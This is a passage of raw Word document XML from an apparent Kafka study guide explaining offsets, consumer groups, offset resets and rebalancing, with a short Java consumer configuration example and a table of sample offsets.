          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>set of offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for each partition it consumes from. Different consumer groups can consume the same partition independently, each maintaining their own offsets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8C342B" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13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For example, if two consumers in different groups consume messages from the same partition, they will have separate offsets in the __consumer_offsets topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBA117D" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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setting Offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003DC746" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13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allows consumers to reset their offsets to a particular point in time or offset. There are a few options:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D127A41" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13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Earliest</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Start from the earliest message available in the partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E907CD" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13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atest</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Start from the most recent message (the end of the log).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDD12D3" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13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pecific Offset</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Start from a specific offset (e.g., offset 5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5227E9D7"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is can be done using the seek() method or by setting the auto.offset.reset property to earliest or latest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6042B7FE"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Example of resetting offsets to the earliest message:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9971C6"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erties properties = new Properties();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAEA559"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erties.put("bootstrap.servers", "localhost:9092");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260A413E"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erties.put("group.id", "test-group");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7275AF60"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erties.put("auto.offset.reset", "earliest");  // Reset to earliest message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D5FD7F" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="576AC248"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Consumer&lt;String, String&gt; consumer = new KafkaConsumer&lt;&gt;(properties);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AC397F"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sumer.subscribe(Arrays.asList("order_topic"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2681D9" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451"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 Offset Management in Practice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F502AF5" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451"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Scenario 1: Consumer Processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418D03FF" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134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lastRenderedPageBreak/>
        <w:t>A Kafka consumer reads from a topic partition. Suppose the consumer has already processed messages up to offset 5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DF2560" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134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f the consumer crashes before committing the offset, upon restarting, it will pick up from the last committed offset (5), ensuring no messages are lost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A9C89D" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451"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Scenario 2: Rebalancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8208B9" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134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When a consumer group undergoes a </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rebalance</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i.e., when consumers join or leave the group), Kafka reassigns partitions to consumers. After rebalancing, each consumer continues consuming from the last committed offset for each partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53958B4E" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134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ensures that no messages are missed or duplicated across consumers in the same consumer group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0E10F8" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451"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ey Takeaways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ADC792" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134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Offsets are unique to each partition</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consumer group</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. They allow consumers to track their progress in consuming messages from partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CDFED7" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134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Offsets are </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatically or manually committed</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, giving consumers control over message processing and fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B62692" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134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stores offsets in the __consumer_offsets internal topic, ensuring the consumer group's progress is persistent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F265D1" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134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groups</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow multiple consumers to scale and parallelize message processing while keeping track of each group's progress through offsets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B38ADF0" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134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Offsets are critical in scenarios involving </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message replay</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fault tolerance</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rebalancing</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> across consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68758DB4" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="0041245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Managing offsets correctly is vital for ensuring </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reliable, efficient, and fault-tolerant</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> consumption of messages from Kafka topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427EE57A" w14:textId="0D715E3E" w:rsidR="00412451" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00412451">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92EA4B3">
          <v:rect id="_x0000_i3158" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="738EFF76" w14:textId="0B54D12C" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB22BB" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="782" w:name="_Toc196308262"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Define offset in Kafka, how it is assigned, and how Kafka consumers track their consumption position</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="782"/>
    </w:p>
    <w:p w14:paraId="34FB8998" w14:textId="215C10C2" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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 Offset: Definition, Assignment, and Consumer Tracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DA5700"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In Kafka, </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>offset</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> refers to the unique identifier for each message within a Kafka </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partition</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It is a numerical value that allows Kafka consumers to track which message they have consumed in a particular partition. Offsets are crucial for maintaining message consumption order and ensuring that consumers can resume from where they left off.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4348591E" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A"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1. What is Kafka Offset?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498F9DA1" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134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Offset</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The offset is a sequential number assigned to each message in a Kafka partition. Each message in the partition is uniquely identified by an offset. Offsets start at 0 and increase incrementally as new messages are appended to the partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259EF924" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134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artition-specific</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Offsets are specific to each partition of a Kafka topic. Different partitions in the same topic have independent sequences of offsets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC890C6" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A"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Example of Offsets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F66ECB2"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Assume you have a topic named order_topic with a single partition. Messages in this partition would have the following offse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8"/>
        <w:gridCol w:w="878"/>
      </w:tblGrid>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="18C82E7F" w14:textId="77777777" w:rsidTr="00047A2A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A9350AA" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A"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Offset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="408A6818" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A"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Message</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="24B4A7C0" w14:textId="77777777" w:rsidTr="00047A2A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52AC8671"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FAE81C1"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Order 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="3F331758" w14:textId="77777777" w:rsidTr="00047A2A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41943409"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D9D1B74"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Order 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="63D13BF5" w14:textId="77777777" w:rsidTr="00047A2A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26135B85"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FAABAE8"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Order 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="5D81E451" w14:textId="77777777" w:rsidTr="00047A2A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CF6127F"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="373092F0"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Order 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5B20DD2D"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n this case, each message in Partition 0 has an offset starting from 0 and incrementing by 1 for each subsequent message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D1FAD1" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A"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2. How are Kafka Offsets Assigned?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108FD3E2" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134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assigns offsets to messages automatically when they are produced and stored in partitions. Each message added to a partition gets a unique offset assigned incrementally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C0422A" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134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does </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not assign offsets to messages at the time of production</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Instead, it assigns them when the message is stored in the partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B746E3" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A"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Offset Assignment Workflow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C272F3B" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134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roducer Sends Message</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A Kafka producer sends a message to a topic partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164BD031" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134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essage is Stored</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The message is stored in the partition, and Kafka assigns an offset to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757EA58A" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134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lastRenderedPageBreak/>
        <w:t>Consumers Track Offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The consumer keeps track of the offsets it has consumed to know where to resume if it needs to restart or recover from a failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A192C0" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A"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3. How Kafka Consumers Track their Consumption Position (Offsets)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F878DB7"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consumers use offsets to keep track of their position in a partition, determining which message they have consumed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5487A4" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A"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ey Concepts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE4501B" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134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Group</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka consumers work as part of a </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer group</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
